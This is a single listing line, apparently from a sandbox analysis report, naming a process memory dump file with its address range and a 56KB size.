• memory/4604-511-0x0000000140000000-0x000000014000E000-memory.dmp — Filesize 56KB